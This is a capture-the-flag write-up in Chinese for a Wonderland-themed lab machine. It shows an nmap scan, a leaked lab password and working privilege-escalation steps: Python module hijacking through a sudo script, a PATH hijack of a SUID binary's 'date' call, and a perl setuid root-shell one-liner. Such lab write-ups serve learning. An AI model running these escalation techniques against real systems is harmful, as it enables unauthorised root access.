中等咯
竟然只有两个问题

===============================================================
root@ip-10-10-0-129:~# nmap -sV -sC 10.10.47.106

Starting Nmap 7.60 ( https://nmap.org ) at 2024-01-28 08:35 GMT
Nmap scan report for ip-10-10-47-106.eu-west-1.compute.internal (10.10.47.106)
Host is up (0.028s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (EdDSA)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
MAC Address: 02:EA:67:5B:75:21 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds

没什么有用的信息,
然后爆破目录,看到/r提示继续,那就接着这个爆破
->/a
->/b
->/b
->/i
->/t

rabbit?没什么用啊emmm
难绷,页面里有
Pasted%20image%2020240128164351
alice:HowDothTheLittleCrocodileImproveHisShiningTail

Pasted%20image%2020240128164747

sudo -l看看,有个脚本
/usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
这个脚本用到了Random库
python3 -c 'import sys; print (sys.path)'看看预定义的库

alice@wonderland:~$ python3 -c 'import sys; print (sys.path)'


['', '/usr/lib/python36.zip', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages']

''表示当前目录,那么在当前目录里写一个random来替换掉那个random

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py只有兔子有那个权限

然后就变成了兔子

drwxr-x--- 2 rabbit rabbit  4096 May 25  2020 .
drwxr-xr-x 6 root   root    4096 May 25  2020 ..
lrwxrwxrwx 1 root   root       9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit   220 May 25  2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit  3771 May 25  2020 .bashrc
-rw-r--r-- 1 rabbit rabbit   807 May 25  2020 .profile
-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty

这个elf文件是有suid权限的

teaParty,晚上来逆一下

void main(void)

{
  setuid(0x3eb);
  setgid(0x3eb);
  puts("Welcome to the tea party!\nThe Mad Hatter will be here soon.");
  system("/bin/echo -n \'Probably by \' && date --date=\'next hour\' -R");
  puts("Ask very nicely, and I will give you some tea while you wait for him");
  getchar();
  puts("Segmentation fault (core dumped)");
  return;
}

发现会
Pasted%20image%2020240128170246
调用一个date

不是完整路径,所以我们可以用环境变量去劫持他

export PATH=/tmp:$PATH这样tmp变量在第一个位置,在/tmp下创建一个date文件

#!/bin/bash

/bin/bash

然后再chmod +x给他执行权限

最后执行teaParty
成功拿到hatter
Pasted%20image%2020240128170458
里面有他的密码,接着ssh上去,提权

传linpeas

发现Pasted%20image%2020240128170540
搜索一下发现
Pasted%20image%2020240128170604

于是执行
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
成功提权